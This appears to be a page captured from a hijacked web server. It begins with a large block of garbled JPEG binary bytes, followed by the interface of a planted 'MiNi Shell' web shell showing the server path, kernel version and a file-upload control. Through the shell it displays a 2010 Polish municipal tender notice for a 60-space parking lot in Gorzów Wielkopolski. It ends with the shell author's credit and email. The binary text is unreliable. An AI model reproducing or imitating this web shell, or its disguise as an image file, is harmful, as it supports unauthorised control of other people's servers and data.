JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100623/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100623/163065-N-2010.html

<p class="kh_header"><b>Gorzów Wielkopolski: WYKONANIE PARKINGU NA 60 MIEJSC POSTOJOWYCH NA SKWERZE                      PRZY UL. DUNIKOWSKIEGO  W GORZOWIE WLKP</b><br>
<b>Numer ogłoszenia: 163065 - 2010; data zamieszczenia: 23.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Gorzów Wlkp. , ul. Sikorskiego 3-4, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7355576, faks 095 7355612.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE PARKINGU NA 60 MIEJSC POSTOJOWYCH NA SKWERZE                      PRZY UL. DUNIKOWSKIEGO  W GORZOWIE WLKP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane polegające na wykonaniu parkingu na 60 miejsc postojowych na skwerze przy ul. Dunikowskiego w Gorzowie Wlkp. Szczegółowy zakres prac objętych przedmiotem zamówienia uwzględniony został w Dokumentacji projektowej oraz Szczegółowej Specyfikacji Technicznej.

ZAKRES PRAC BĘDĄCYCH PRZEDMIOTEM ZAMÓWIENIA ZOSTAJE PODZIELONY NA  III ETAPY.

ETAP  I A
- wykonanie drogi manewrowej i zjazdu na parking,
- wykonanie miejsc postojowych,
- wykonanie odwodnienia.

Branża drogowa
Rozwiązania komunikacyjne (jezdnia i stanowiska postojowe)
-modernizacja istniejącej skarpy,
- warstwy odsączające z piasku,
-podbudowa z kruszywa łamanego o gr. 15 cm,
-droga manewrowa i zjazd na parking wykonane z kostki betonowej gr 8 cm. na podsypce cementowo-piaskowej,
-przecięcia krawędzi nawierzchni zjazdu i drogi wyokrąglone łukiem o promieniu nie mniejszym niż 5,0 m,
-miejsca postojowe wykonane z kostki betonowej 20x8x20 cm z wypustkami dystansowymi na podsypce piaskowej,
- nawierzchnie w kolorze: szarym-jezdnia i czerwonym - miejsca postojowe,
-obramowanie nawierzchni parkingu i wjazdu: krawężnik betonowy uliczny 15x30x100 na podsypce piaskowo-cementowej w ławie betonowej z oporem z betonu B15 - dł. 176,80 mb,
- linie rozdzielające pomiędzy miejscami postojowymi w kolorze czarnym,
-miejsca postojowe o wymiarach 2,5x5,0 m ( 20 miejsc postojowych),
- szerokość jezdni manewrowej 6,0 m,
- postawienie krawężnika tymczasowego na podsypce cementowo-piaskowej kończącego etap I na całej szerokości parkingu - dł. 6 mb,
- słupki do znaków drogowych wraz z tablicami znaków zakazu, nakazu, informującymi (1 szt)
-ziemię z urobku z profilowania parkingu należy przewieźć na pobliską skarpę i wyprofilować ją zgodnie z projektem.

Bilans powierzchni
-droga manewrowa z kostki betonowej - 252,00 m2 ,
- miejsca postojowe z kostki betonowej z wypustkami dystansowymi - 250,00 m2 .

Branża sanitarna
- montaż studzienek ściekowych z gotowych elementów ulicznych betonowych o średnicy 500 mm z osadnikiem bez syfonu ( 2 szt),
-  wpusty żeliwne klasy D400 (Wp1-Wp4), o wymiarach 500x500 z zawiasem i ryglem,
-studnie rewizyjne z kręgów żelbetonowych o 1000  z osadnikiem oraz koszem na zanieczyszczenia. Właz żeliwny klasy D400 (3 szt),
- Odprowadzenie wód deszczowych z wpustów deszczowych, wykonane przy pomocy rur z niespienionego PVC-U klasy SN8 SDR 34 średnicy o 200 mm - dł. 107,5 m,
- w miejscach przejść rurociągów kanalizacji deszczowej przez ściany konstrukcyjne studni betonowych należy zastosować przejścia szczelne. W miejscu poprzecznego przejścia rurociągu przyłącza kanalizacji deszczowej pod drogami należy zastosować stalowe rury ochronne,
- na studniach należy stosować włazy żeliwne z wypełnieniem betonowym (PN-EN 124:2000) o nośności 40 ton, z napisem Kanalizacja deszczowa - Gorzów.
-  rury układać na zagęszczonej podsypce 10 cm. W trakcie układania stosować podsypkę montażową z luźnego piasku 5 cm. Rury po ułożeniu, połączeniu i wypoziomowaniu obsypać piaskiem do wysokości 30 cm. ponad rurę w celu zabezpieczenia,
- wykonanie inspekcji telewizyjnej oraz badania szczelności nowowybudowanej kanalizacji deszczowej po zakończeniu całości prac związanych z realizacją ETAPU IA. 
- realizacja zobowiązań ciążących na Inwestorze wynikających z Warunków Technicznych znak ZWTP/0559/09 z dnia 26.10.2009 r. 

ETAP  I B
- wykonanie drogi manewrowej parkingu,
- wykonanie miejsc postojowych,
- wykonanie odwodnienia.

Branża drogowa
Rozwiązania komunikacyjne (jezdnia i stanowiska postojowe)
- warstwy odsączające z piasku,
-podbudowa z kruszywa łamanego o gr. 15 cm,
- droga manewrowa wykonana z kostki betonowej gr 8 cm.  na podsypce cementowo-piaskowej,
- miejsca postojowe wykonane z kostki betonowej 20x8x20 cm z wypustkami dystansowymi na podsypce piaskowej,
- nawierzchnie w kolorze: szarym-jezdnia i czerwonym - miejsca postojowe,
- obramowanie nawierzchni parkingu: krawężnik betonowy uliczny 15x30x100 na podsypce piaskowo-cementowej w ławie betonowej z oporem z betonu B15 - dł. 90,80 mb, 
- linie rozdzielające pomiędzy miejscami postojowymi w kolorze czarnym,
-miejsca postojowe o wymiarach 2,5x5,0 m ( 20 miejsc postojowych), 
- szerokość jezdni manewrowej 6,0 m,
- przestawienie krawężnika tymczasowego na podsypce cementowo-piaskowej w miejsce zakończenia ETAPU I B , 
-ziemię z urobku z profilowania parkingu należy przewieźć na pobliską skarpę i wyprofilować ją zgodnie z projektem.

Bilans powierzchni
-droga manewrowa z kostki betonowej - 162,00 m2 ,
- miejsca postojowe z kostki betonowej z wypustkami dystansowymi - 250,00 m2 .

Branża sanitarna
- studzienki ściekowe z gotowych elementów uliczne betonowe o średnicy 500 mm z osadnikiem bez syfonu (1 szt),
  - studnia rewizyjna z kręgów żelbetonowych o 1000  z osadnikiem oraz koszem na zanieczyszczenia. Właz żeliwny klasy D400 (1 szt),
- wykonanie inspekcji telewizyjnej oraz badania szczelności nowowybudowanej kanalizacji deszczowej po zakończeniu całości prac związanych z realizacją  ETAPU I B. ( na odcinku etapu Ib)

ETAP  I C
- wykonanie drogi manewrowej i zjazdu na parking,
- wykonanie miejsc postojowych,
- wykonanie odwodnienia.
- usunięcie kolizji energetycznej

Branża drogowa
Rozwiązania komunikacyjne (jezdnia i stanowiska postojowe)
-modernizacja istniejącej skarpy,
- warstwy odsączające z piasku,
- podbudowa z kruszywa łamanego o gr. 15 cm,
- droga manewrowa i zjazd na parking wykonane z kostki betonowej gr 8 cm na podsypce cementowo-piaskowej,
- przecięcia krawędzi nawierzchni zjazdu i drogi wyokrąglone łukiem o promieniu nie mniejszym niż 5,0 m,
- miejsca postojowe wykonane z kostki betonowej 20x8x20 cm z wypustkami dystansowymi na podsypce piaskowej,
- nawierzchnie w kolorze: szarym-jezdnia i czerwonym - miejsca postojowe,
- obramowanie nawierzchni parkingu i wjazdu: krawężnik betonowy uliczny 15x30x100 na podsypce piaskowo-cementowej w ławie betonowej z oporem z betonu B15 - dł.185,30 mb,
- linie rozdzielające pomiędzy miejscami postojowymi w kolorze czarnym,
- miejsca postojowe o wymiarach 2,5x5,0 m oraz 3,6 x 5,0 m dla pojazdów osób niepełnosprawnych ( 20  miejsc postojowych w tym 2 miejsca dla osób niepełnosprawnych),
- szerokość jezdni manewrowej 6,0 m,
- rozebranie krawężnika tymczasowego na podsypce cementowo-piaskowej z miejsca zakończenia ETAPU IB,
- słupki do znaków drogowych wraz z tablicami znaków zakazu, nakazu, informującymi  (1 szt),
- pochylenia poprzeczne i podłużne nawierzchni w celu zapewnienia dobrego spływu wód opadowych z nawierzchni zgodnie z projektem,
- ziemię z urobku z profilowania parkingu należy przewieźć na pobliską skarpę i wyprofilować ją zgodnie z projektem.
- realizacja zobowiązań ciążących na Inwestorze wynikających z decyzji znak WDT-X-7332-1/101/09 z dnia 09.12.2009 r. (Projekt Budowlany)

Bilans powierzchni
-droga manewrowa z kostki betonowej - 255,00 m2 ,
- miejsca postojowe z kostki betonowej z wypustkami dystansowymi - 260,00 m2 .

Branża sanitarna
- studzienka ściekowa z gotowych elementów uliczne betonowe o średnicy 500 mm z osadnikiem bez syfonu,
- wykonanie inspekcji telewizyjnej oraz badania szczelności nowowybudowanej kanalizacji deszczowej po zakończeniu całości prac związanych z realizacją etapu Ic. ( na odcinku ETAPU IC)

Branża elektryczna
- usunięcie kolizji,
- realizacja zobowiązań ciążących na Inwestorze wynikających z pisma WDT-VIII-5548-7/D/330/2009 (Dokumentacja Budowlana)
- realizacja prac budowlanych w oparciu o Umowę na likwidację kolizji nr 29/kol/RD-1/2009 (Dokumentacja Budowlana)


ZAKRES PRAC W ODNIESIENIU DO POSZCZEGÓLNYCH ETAPÓW, REALIZOWANY BĘDZIE  W ZALEŻNOŚCI OD POSIADANYCH PRZEZ ZAMAWIAJĄCEGO ŚRODKÓW FINANSOWYCH TZN., ŻE ZAMAWIAJĄCY UZALEŻNIA REALIZACJĘ ETAPÓW IB I IC OD WARTOŚCI ZŁOŻONYCH OFERT  ORAZ POSIADANYCH ŚRODKÓW..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  na podstawie ustawy Pzp., art. 67 ust. 1 pkt 6 przewiduje możliwość udzielenia Wykonawcy zamówień uzupełniających stanowiących nie więcej niż 21% wartości  zamówienia podstawowego stanowiącej sumę kwot ryczałtowych za etapy Ia, Ib i Ic,  polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0, 45.11.12.00-0, 45.23.32.22-1, 45.23.24.52-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 2 500,00 zł.  (słownie: dwa tysiące pięćset złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy zrealizowali w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
- co najmniej jedną robotę budowlaną polegającą na wykonaniu nawierzchni z kostki betonowej/kamiennej (drogi manewrowe, miejsca postojowe) na kwotę minimum 50.000 tyś. brutto w ramach jednego zadania. 
Wykonawca załączy dokumenty potwierdzające, że zrealizowane przez niego roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo zakończone, (np. referencje).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia, posiadającymi niezbędne kwalifikacje tj. uprawnienia do kierowania robotami budowlanymi w zakresie budowy dróg,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Upoważnienie (w formie oryginału lub notarialnie potwierdzonej kopii) dla osoby reprezentującej Wykonawcę, o ile nie wynika to z innych dokumentów. W przypadku zawiązania konsorcjum należy załączyć pełnomocnictwo dla podmiotu reprezentującego kilku Wykonawców. 
2.Pisemne zobowiązanie podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - załączyć w przypadku polegania na osobach innych podmiotów. 
3. Zakres zamówienia, który zostanie zlecony podwykonawcom.
4.Dowód wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty.
Zmiany te mogą dotyczyć:
-konieczność przedłużenia terminu wykonania zamówienia ze względu na potrzebę wykonania dodatkowych robót budowlanych, ale wyłącznie o czas ich prowadzenia, jeżeli nie jest możliwe ich  przeprowadzenie jednocześnie z zadaniem podstawowym,
-istotnej, leżącej po stronie Zamawiającego, zwłoki w przekazaniu placu budowy Wykonawcy, o ilości dni opóźnienia,
-wystąpienia awarii nie zawinionej czynnościami lub nie wynikającej z zaniechania czynności, do  których Wykonawca był zobowiązany,
-działań osób trzecich lub organów władzy publicznej, które spowodują przerwanie lub czasowe zawieszenie realizacji zamówienia,
-wystąpienia warunków pogodowych uniemożliwiających realizację zadania w terminie przy zachowaniu czynników niezbędnych do właściwego i zgodnego z technologią wykonania prac.
Zamawiający dopuszcza dokonanie zmiany w umowie, jeżeli konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a zmiany są korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gorzow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Gorzowa Wlkp.; ul. Sikorskiego 3-4; 66-400 Gorzów Wlkp. Koszt wydrukowanej dokumentacji wynosi: 73,00 zł Sposób płatności: przelew..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2010 godzina 10:00, miejsce: Urząd Miasta Gorzowa Wlkp. 66-400 Gorzów Wlkp. ul. Sikorskiego 3-4, Kancelaria Ogólna (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com